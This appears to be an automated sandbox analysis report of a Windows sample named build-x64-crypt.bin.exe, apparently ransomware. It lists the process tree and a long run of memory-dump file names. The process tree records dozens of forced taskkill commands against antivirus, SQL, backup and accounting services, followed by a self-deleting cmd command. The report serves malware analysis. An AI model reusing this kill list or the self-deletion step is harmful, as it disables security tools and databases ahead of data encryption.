C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM BrCcUxSys*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM BrCcUxSys*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SimplyConnectionManager*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SimplyConnectionManager*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Simply.SystemTrayIcon*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Simply.SystemTrayIcon*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM fbguard*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fbguard*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM fbserver*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fbserver*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM ONENOTEM*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM ONENOTEM*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM wrapper*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wrapper*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM DefWatch*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM DefWatch*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM ccEvtMgr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM ccEvtMgr*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM ccSetMgr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM ccSetMgr*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SavRoam*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SavRoam*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Sqlservr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Sqlservr*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqlagent*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlagent*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqladhlp*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqladhlp*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Culserver*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Culserver*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM RTVscan*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM RTVscan*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqlbrowser*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlbrowser*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLADHLP*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLADHLP*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBIDPService*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBIDPService*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBCFMonitorService*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBCFMonitorService*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqlwriter*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlwriter*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM msmdsrv*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM msmdsrv*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM tomcat6*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM tomcat6*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM zhudongfangyu*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM zhudongfangyu*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM vmware-usbarbitator64*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM vmware-usbarbitator64*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM vmware-converter*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM vmware-converter*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM dbsrv12*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM dbsrv12*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM dbeng8*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM dbeng8*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$VEEAMSQL2012*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$VEEAMSQL2012*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLBrowser*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLBrowser*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLWriter*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLWriter*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM FishbowlMySQL*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM FishbowlMySQL*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MySQL57*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MySQL57*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQLServerADHelper100*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQLServerADHelper100*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM msftesql-Exchange*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM msftesql-Exchange*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##SSEE*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$SBSMONITORING*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$SHAREPOINT*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$SBSMONITORING*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$SHAREPOINT*3⤵
- Kills process with taskkill
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell [System.Net.Dns]::GetHostByAddress('10.7.0.38').hostname2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe" /F2⤵
- Deletes itself
-
C:\Windows\system32\timeout.exetimeout /T 15 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/204-130-0x0000000000000000-mapping.dmp
-
memory/208-131-0x0000000000000000-mapping.dmp
-
memory/208-198-0x0000000000000000-mapping.dmp
-
memory/208-64-0x0000000000000000-mapping.dmp
-
memory/208-195-0x0000000000000000-mapping.dmp
-
memory/216-152-0x0000000000000000-mapping.dmp
-
memory/216-23-0x0000000000000000-mapping.dmp
-
memory/220-90-0x0000000000000000-mapping.dmp
-
memory/220-176-0x0000000000000000-mapping.dmp
-
memory/220-44-0x0000000000000000-mapping.dmp
-
memory/232-85-0x0000000000000000-mapping.dmp
-
memory/232-170-0x0000000000000000-mapping.dmp
-
memory/236-106-0x0000000000000000-mapping.dmp
-
memory/236-192-0x0000000000000000-mapping.dmp
-
memory/268-60-0x0000000000000000-mapping.dmp
-
memory/308-58-0x0000000000000000-mapping.dmp
-
memory/336-160-0x0000000000000000-mapping.dmp
-
memory/340-165-0x0000000000000000-mapping.dmp
-
memory/340-122-0x0000000000000000-mapping.dmp
-
memory/372-158-0x0000000000000000-mapping.dmp
-
memory/480-55-0x0000000000000000-mapping.dmp
-
memory/480-186-0x0000000000000000-mapping.dmp
-
memory/480-100-0x0000000000000000-mapping.dmp
-
memory/520-84-0x0000000000000000-mapping.dmp
-
memory/520-19-0x0000000000000000-mapping.dmp
-
memory/520-149-0x0000000000000000-mapping.dmp
-
memory/564-187-0x0000000000000000-mapping.dmp
-
memory/564-101-0x0000000000000000-mapping.dmp
-
memory/576-190-0x0000000000000000-mapping.dmp
-
memory/576-39-0x0000000000000000-mapping.dmp
-
memory/600-25-0x0000000000000000-mapping.dmp
-
memory/600-132-0x0000000000000000-mapping.dmp
-
memory/660-148-0x0000000000000000-mapping.dmp
-
memory/748-0-0x0000000000000000-mapping.dmp
-
memory/748-46-0x0000000000000000-mapping.dmp
-
memory/760-188-0x0000000000000000-mapping.dmp
-
memory/760-102-0x0000000000000000-mapping.dmp
-
memory/764-172-0x0000000000000000-mapping.dmp
-
memory/764-40-0x0000000000000000-mapping.dmp
-
memory/832-56-0x0000000000000000-mapping.dmp
-
memory/836-156-0x0000000000000000-mapping.dmp
-
memory/848-162-0x0000000000000000-mapping.dmp
-
memory/880-62-0x0000000000000000-mapping.dmp
-
memory/880-193-0x0000000000000000-mapping.dmp
-
memory/880-129-0x0000000000000000-mapping.dmp
-
memory/1028-13-0x0000000000000000-mapping.dmp
-
memory/1028-77-0x0000000000000000-mapping.dmp
-
memory/1044-180-0x0000000000000000-mapping.dmp
-
memory/1044-116-0x0000000000000000-mapping.dmp
-
memory/1048-35-0x0000000000000000-mapping.dmp
-
memory/1068-150-0x0000000000000000-mapping.dmp
-
memory/1072-134-0x0000000000000000-mapping.dmp
-
memory/1072-24-0x0000000000000000-mapping.dmp
-
memory/1072-113-0x0000000000000000-mapping.dmp
-
memory/1076-66-0x0000000000000000-mapping.dmp
-
memory/1076-111-0x0000000000000000-mapping.dmp
-
memory/1080-107-0x0000000000000000-mapping.dmp
-
memory/1080-171-0x0000000000000000-mapping.dmp
-
memory/1088-133-0x0000000000000000-mapping.dmp
-
memory/1088-45-0x0000000000000000-mapping.dmp
-
memory/1092-154-0x0000000000000000-mapping.dmp
-
memory/1096-151-0x0000000000000000-mapping.dmp
-
memory/1096-87-0x0000000000000000-mapping.dmp
-
memory/1100-18-0x0000000000000000-mapping.dmp
-
memory/1108-143-0x0000000000000000-mapping.dmp
-
memory/1144-22-0x0000000000000000-mapping.dmp
-
memory/1288-166-0x0000000000000000-mapping.dmp
-
memory/1292-174-0x0000000000000000-mapping.dmp
-
memory/1292-42-0x0000000000000000-mapping.dmp
-
memory/1304-128-0x0000000000000000-mapping.dmp
-
memory/1304-21-0x0000000000000000-mapping.dmp
-
memory/1304-197-0x0000000000000000-mapping.dmp
-
memory/1316-169-0x0000000000000000-mapping.dmp
-
memory/1316-105-0x0000000000000000-mapping.dmp
-
memory/1388-145-0x0000000000000000-mapping.dmp
-
memory/1388-81-0x0000000000000000-mapping.dmp
-
memory/1388-37-0x0000000000000000-mapping.dmp
-
memory/1400-16-0x0000000000000000-mapping.dmp
-
memory/1416-118-0x0000000000000000-mapping.dmp
-
memory/1416-161-0x0000000000000000-mapping.dmp
-
memory/1432-189-0x0000000000000000-mapping.dmp
-
memory/1432-36-0x0000000000000000-mapping.dmp
-
memory/1448-38-0x0000000000000000-mapping.dmp
-
memory/1448-104-0x0000000000000000-mapping.dmp
-
memory/1452-78-0x0000000000000000-mapping.dmp
-
memory/1464-120-0x0000000000000000-mapping.dmp
-
memory/1464-163-0x0000000000000000-mapping.dmp
-
memory/1468-185-0x0000000000000000-mapping.dmp
-
memory/1468-99-0x0000000000000000-mapping.dmp
-
memory/1480-183-0x0000000000000000-mapping.dmp
-
memory/1480-97-0x0000000000000000-mapping.dmp
-
memory/1496-79-0x0000000000000000-mapping.dmp
-
memory/1496-15-0x0000000000000000-mapping.dmp
-
memory/1500-59-0x0000000000000000-mapping.dmp
-
memory/1500-164-0x0000000000000000-mapping.dmp
-
memory/1516-67-0x0000000000000000-mapping.dmp
-
memory/1520-127-0x0000000000000000-mapping.dmp
-
memory/1520-191-0x0000000000000000-mapping.dmp
-
memory/1532-139-0x0000000000000000-mapping.dmp
-
memory/1536-9-0x0000000000000000-mapping.dmp
-
memory/1540-72-0x0000000000000000-mapping.dmp
-
memory/1556-140-0x0000000000000000-mapping.dmp
-
memory/1556-119-0x0000000000000000-mapping.dmp
-
memory/1556-30-0x0000000000000000-mapping.dmp
-
memory/1560-93-0x0000000000000000-mapping.dmp
-
memory/1560-179-0x0000000000000000-mapping.dmp
-
memory/1564-50-0x0000000000000000-mapping.dmp
-
memory/1568-91-0x0000000000000000-mapping.dmp
-
memory/1568-155-0x0000000000000000-mapping.dmp
-
memory/1572-112-0x0000000000000000-mapping.dmp
-
memory/1576-7-0x0000000000000000-mapping.dmp
-
memory/1584-126-0x0000000000000000-mapping.dmp
-
memory/1584-82-0x0000000000000000-mapping.dmp
-
memory/1584-17-0x0000000000000000-mapping.dmp
-
memory/1592-54-0x0000000000000000-mapping.dmp
-
memory/1600-6-0x0000000000000000-mapping.dmp
-
memory/1604-8-0x0000000000000000-mapping.dmp
-
memory/1604-52-0x0000000000000000-mapping.dmp
-
memory/1612-29-0x0000000000000000-mapping.dmp
-
memory/1616-1-0x0000000000000000-mapping.dmp
-
memory/1620-31-0x0000000000000000-mapping.dmp
-
memory/1624-73-0x0000000000000000-mapping.dmp
-
memory/1704-96-0x0000000000000000-mapping.dmp
-
memory/1704-182-0x0000000000000000-mapping.dmp
-
memory/1704-51-0x0000000000000000-mapping.dmp
-
memory/1720-110-0x0000000000000000-mapping.dmp
-
memory/1752-117-0x0000000000000000-mapping.dmp
-
memory/1752-28-0x0000000000000000-mapping.dmp
-
memory/1752-138-0x0000000000000000-mapping.dmp
-
memory/1756-49-0x0000000000000000-mapping.dmp
-
memory/1756-159-0x0000000000000000-mapping.dmp
-
memory/1756-94-0x0000000000000000-mapping.dmp
-
memory/1760-71-0x0000000000000000-mapping.dmp
-
memory/1760-5-0x0000000000000000-mapping.dmp
-
memory/1764-70-0x0000000000000000-mapping.dmp
-
memory/1768-4-0x0000000000000000-mapping.dmp
-
memory/1804-61-0x0000000000000000-mapping.dmp
-
memory/1804-146-0x0000000000000000-mapping.dmp
-
memory/1804-125-0x0000000000000000-mapping.dmp
-
memory/1824-89-0x0000000000000000-mapping.dmp
-
memory/1824-153-0x0000000000000000-mapping.dmp
-
memory/1844-173-0x0000000000000000-mapping.dmp
-
memory/1844-109-0x0000000000000000-mapping.dmp
-
memory/1844-20-0x0000000000000000-mapping.dmp
-
memory/1848-167-0x0000000000000000-mapping.dmp
-
memory/1848-103-0x0000000000000000-mapping.dmp
-
memory/1852-80-0x0000000000000000-mapping.dmp
-
memory/1852-124-0x0000000000000000-mapping.dmp
-
memory/1860-86-0x0000000000000000-mapping.dmp
-
memory/1860-41-0x0000000000000000-mapping.dmp
-
memory/1860-194-0x0000000000000000-mapping.dmp
-
memory/1864-63-0x0000000000000000-mapping.dmp
-
memory/1876-83-0x0000000000000000-mapping.dmp
-
memory/1876-147-0x0000000000000000-mapping.dmp
-
memory/1884-175-0x0000000000000000-mapping.dmp
-
memory/1884-43-0x0000000000000000-mapping.dmp
-
memory/1884-88-0x0000000000000000-mapping.dmp
-
memory/1888-65-0x0000000000000000-mapping.dmp
-
memory/1896-68-0x0000000000000000-mapping.dmp
-
memory/1896-177-0x0000000000000000-mapping.dmp
-
memory/1900-2-0x0000000000000000-mapping.dmp
-
memory/1904-27-0x0000000000000000-mapping.dmp
-
memory/1908-168-0x0000000000000000-mapping.dmp
-
memory/1912-48-0x0000000000000000-mapping.dmp
-
memory/1920-178-0x0000000000000000-mapping.dmp
-
memory/1920-92-0x0000000000000000-mapping.dmp
-
memory/1920-47-0x0000000000000000-mapping.dmp
-
memory/1924-3-0x0000000000000000-mapping.dmp
-
memory/1924-135-0x0000000000000000-mapping.dmp
-
memory/1928-26-0x0000000000000000-mapping.dmp
-
memory/1928-115-0x0000000000000000-mapping.dmp
-
memory/1928-136-0x0000000000000000-mapping.dmp
-
memory/1932-108-0x0000000000000000-mapping.dmp
-
memory/1936-69-0x0000000000000000-mapping.dmp
-
memory/1952-137-0x0000000000000000-mapping.dmp
-
memory/1960-196-0x0000000000000000-mapping.dmp
-
memory/1964-141-0x0000000000000000-mapping.dmp
-
memory/1968-98-0x0000000000000000-mapping.dmp
-
memory/1968-53-0x0000000000000000-mapping.dmp
-
memory/1968-184-0x0000000000000000-mapping.dmp
-
memory/1972-75-0x0000000000000000-mapping.dmp
-
memory/1976-10-0x0000000000000000-mapping.dmp
-
memory/1976-95-0x0000000000000000-mapping.dmp
-
memory/1976-181-0x0000000000000000-mapping.dmp
-
memory/1980-11-0x0000000000000000-mapping.dmp
-
memory/1984-114-0x0000000000000000-mapping.dmp
-
memory/1984-157-0x0000000000000000-mapping.dmp
-
memory/1988-74-0x0000000000000000-mapping.dmp
-
memory/2012-33-0x0000000000000000-mapping.dmp
-
memory/2020-76-0x0000000000000000-mapping.dmp
-
memory/2020-12-0x0000000000000000-mapping.dmp
-
memory/2028-57-0x0000000000000000-mapping.dmp
-
memory/2032-14-0x0000000000000000-mapping.dmp
-
memory/2032-123-0x0000000000000000-mapping.dmp
-
memory/2032-144-0x0000000000000000-mapping.dmp
-
memory/2036-34-0x0000000000000000-mapping.dmp
-
memory/2040-32-0x0000000000000000-mapping.dmp
-
memory/2040-121-0x0000000000000000-mapping.dmp
-
memory/2040-142-0x0000000000000000-mapping.dmp